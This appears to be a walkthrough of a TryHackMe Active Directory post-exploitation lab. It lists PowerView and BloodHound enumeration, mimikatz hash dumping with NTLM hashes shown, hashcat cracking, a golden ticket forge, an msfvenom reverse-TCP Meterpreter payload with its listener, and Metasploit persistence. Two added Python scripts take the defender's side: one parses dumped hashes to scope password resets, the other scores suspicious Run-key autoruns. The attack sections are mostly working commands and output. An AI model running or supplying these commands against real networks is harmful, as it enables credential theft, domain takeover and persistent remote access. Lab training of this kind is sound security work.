https://tryhackme.com/room/postexploit

Task 2 - Enumeration w/ PowerView

$ ssh [email protected]

> powershell -ep bypass # bypass execution policy so you can run scripts
PS> . .\Downloads\PowerView.ps1
PS> Get-NetUser | select cn
PS> Get-NetGroup -GroupName *admin*

PS> Invoke-ShareFinder
PS> Get-NetComputer -fulldata | select operatingsystem

Task 3 - Enumeration w/ Bloodhound

PS> . .\Downloads\SharpHound.ps1
PS> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS> scp -o StrictHostKeyChecking=no 20200802172728_loot.zip [email protected]:~

kali@kali:~$ sudo neo4j console
# Browser: <http://localhost:7474> -> login with neo4j:neo4j(j)
kali@kali:~$ bloodhound

In Bloodhound: upload loot.zip (Upload Data), then explore the pre-built queries

Task 4 - Dumping Hashes w/ mimikatz

> cd Downloads && mimikatz.exe

# ensure running as admin
mimikatz # privilege::debug
Privilege '20' OK

# dump hashes
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f4 (500)                                         
User : Administrator                                          
LM   :                                                        
NTLM : 2777b7fec870e04dda00cd7260f7bee6
[...]

kali@kali:~$ hashcat -m1000 <hash> rockyou.txt
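Added example (not part of the TryHackMe room or of mimikatz): when a dump like the one above turns up during an incident, the first job is scoping, i.e. which accounts must be reset, which of them share a password, and whether krbtgt is among them. The Python below parses both shapes of `lsadump::lsa` output that appear on this page (the `/patch` listing in Task 4 and the per-account `/inject /name:` block in Task 5) into records and produces that list. The sample text is constructed to mirror the page's format; the Administrator and krbtgt values are the ones shown on the page, while Guest and svc-backup are made up (svc-backup deliberately reuses the Administrator hash to exercise the reuse check).

```python
import re
from collections import defaultdict

# Constructed sample in the shape of `lsadump::lsa /patch` output. The Administrator
# entry matches this page; Guest and svc-backup are made-up accounts, and svc-backup
# deliberately reuses the Administrator hash to show the password-reuse check.
SAMPLE_PATCH = """\
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 0000045a (1114)
User : svc-backup
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
"""

# Constructed sample in the shape of `lsadump::lsa /inject /name:krbtgt` output
# (per-account block, hash indented under " * Primary"); values match this page.
SAMPLE_INJECT = """\
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
"""

FIELD_RE = re.compile(r"^\s*(Domain|RID|User|LM|NTLM)\s*:\s*(.*?)\s*$")
RID_RE = re.compile(r"\((\d+)\)")


def parse_lsadump(text):
    """Parse either output shape into (domain, records).

    domain  -> {"name": ..., "sid": ...} or None
    records -> list of {"rid": int|None, "user": str|None, "lm": str, "ntlm": str}
    A new record starts at every "RID :" line; LM/NTLM lines attach to the open
    record regardless of indentation, which is what makes the /inject shape parse.
    """
    domain, records, current = None, [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Domain":
            name, _, sid = value.partition("/")
            domain = {"name": name.strip(), "sid": sid.strip()}
        elif key == "RID":
            rm = RID_RE.search(value)
            current = {"rid": int(rm.group(1)) if rm else None, "user": None, "lm": "", "ntlm": ""}
            records.append(current)
        elif current is not None:
            current[key.lower()] = value
    return domain, records


def triage(records):
    """Summarise what a responder needs to act on after a confirmed LSA dump."""
    by_hash = defaultdict(list)
    for r in records:
        if r["ntlm"]:
            by_hash[r["ntlm"].lower()].append(r["user"])
    return {
        # every account whose NTLM hash was exposed needs a password change
        "exposed_accounts": sorted(r["user"] for r in records if r["ntlm"]),
        # identical NTLM hashes mean identical passwords (NTLM is unsalted)
        "shared_passwords": {h: sorted(u) for h, u in by_hash.items() if len(u) > 1},
        # krbtgt exposure means golden tickets are possible until krbtgt is reset twice
        "krbtgt_exposed": any(r["rid"] == 502 or (r["user"] or "").lower() == "krbtgt" for r in records),
        # a populated LM field means LM hash storage is still enabled somewhere
        "legacy_lm_present": sorted(r["user"] for r in records if r["lm"]),
    }


if __name__ == "__main__":
    for sample in (SAMPLE_PATCH, SAMPLE_INJECT):
        domain, recs = parse_lsadump(sample)
        print(domain, triage(recs))
```

Feed it the saved mimikatz output instead of the samples to get the reset list for a real case; the krbtgt flag is the one that changes the whole response, because every existing TGT stays valid until krbtgt has been reset twice.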

Task 5 - Golden Ticket Attacks w/ mimikatz

> cd Downloads && mimikatz.exe

# ensure running as admin
mimikatz # privilege::debug

# dump the NTLM hash and SID/RID of the krbtgt account
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf

# generate golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

# open cmd with elevated privileges
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6CBE143B8

# not possible in this lab box, but for example:
> dir \\Desktop-1\c$ # list the C:\ drive of Desktop-1 over SMB
> PsExec.exe \\Desktop-1 cmd.exe # run cmd on Desktop-1

Task 6 - Enumeration w/ Server Manager

RDP (Remmina)

Simply look around 🙂

Task 7 - Maintaining Access

# create payload
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.83.23 LPORT=5555 -f exe -o shell.exe

# delivering payload
kali@kali:~$ scp shell.exe [email protected]:.

# connecting to payload
kali@kali:~$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp # must match the msfvenom payload; without it the handler stages a plain command shell
msf5 exploit(multi/handler) > set lhost 10.8.83.23
msf5 exploit(multi/handler) > set lport 5555 # must match the LPORT baked into shell.exe (the handler default is 4444)
msf5 exploit(multi/handler) > run -z # -z backgrounds the session as soon as it connects
# the capture below was taken without payload/lport set, hence port 4444 and a command shell session
[*] Started reverse TCP handler on 10.8.83.23:4444
# run shell.exe on target machine
[*] Command shell session 1 opened (10.8.83.23:4444 -> 10.10.242.217:50062) at 2020-08-02 22:21:15 -0400
background # return to msfconsole, keeping the session open (not needed with run -z)

# creating persistence
msf5 exploit(multi/handler) > use exploit/windows/local/persistence
msf5 exploit(windows/local/persistence) > set session 1
msf5 exploit(windows/local/persistence) > run

# if the connection dies, switch back (use exploit/multi/handler) and run again

# some difficulties getting this to work
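Added example (not part of the room or of Metasploit): the persistence module used above typically drops a VBScript into %TEMP% and registers it under a Run key so it is launched at logon; the Python below is the corresponding defender-side triage, scoring Run-key entries for the traits such an artefact shows (script file as autorun target, user-writable temp path, script-host interpreter, randomly generated value name). The three entries are constructed; the third is an assumption of what the module leaves behind, not a captured artefact, and the exact value data varies by module version. On Windows the collector reads the real HKLM and HKCU Run keys through the standard `winreg` module; elsewhere it falls back to the sample.

```python
import re
import sys

# Constructed autorun entries as (key, value name, value data), the shape you get from
# `reg query ...\Run` or from collect_run_keys() below. The first two are ordinary;
# the third mirrors what exploit/windows/local/persistence typically leaves behind:
# a randomly named Run value launching a VBScript dropped in %TEMP% (assumed shape).
AUTORUNS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "qZkPkDVwB",
     r"C:\Users\Administrator\AppData\Local\Temp\YcVxpNLbm.vbs"),
]

SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)\b", re.I)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh)(\.exe)?\b", re.I)
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|Public)\\", re.I)


def looks_random(name):
    """Crude check for generated names like 'qZkPkDVwB': long, alphabetic, almost no vowels."""
    if not re.fullmatch(r"[A-Za-z]{8,}", name):
        return False
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return vowels / len(name) < 0.25


def score_autorun(key, name, data):
    """Return the list of suspicious traits a single Run-key value exhibits."""
    reasons = []
    if SCRIPT_EXT.search(data):
        reasons.append("autorun target is a script file")
    if SCRIPT_HOST.search(data):
        reasons.append("autorun runs a script host")
    if USER_WRITABLE.search(data):
        reasons.append("target lives in a user-writable temp/download path")
    if looks_random(name):
        reasons.append("value name looks randomly generated")
    return reasons


def triage_autoruns(entries, min_reasons=2):
    """Return entries with at least min_reasons traits, most suspicious first."""
    hits = []
    for key, name, data in entries:
        reasons = score_autorun(key, name, data)
        if len(reasons) >= min_reasons:
            hits.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return sorted(hits, key=lambda h: -len(h["reasons"]))


def collect_run_keys():
    """Read the real Run keys on Windows; on other platforms return the constructed sample."""
    if sys.platform != "win32":
        return AUTORUNS
    import winreg
    entries = []
    subkey = r"Software\Microsoft\Windows\CurrentVersion\Run"
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE), ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            with winreg.OpenKey(hive, subkey) as k:
                i = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(k, i)
                    except OSError:  # no more values
                        break
                    entries.append((hive_name + "\\" + subkey, name, str(data)))
                    i += 1
        except OSError:  # key absent or not readable
            continue
    return entries


if __name__ == "__main__":
    for hit in triage_autoruns(collect_run_keys()):
        print(hit["name"], "->", hit["data"], "|", "; ".join(hit["reasons"]))
```

Two traits are required before an entry is reported, so a legitimate vendor script in a normal location or a single oddly named value does not fire on its own; the same scoring works on RunOnce and on the per-user Startup folder if you extend the collector.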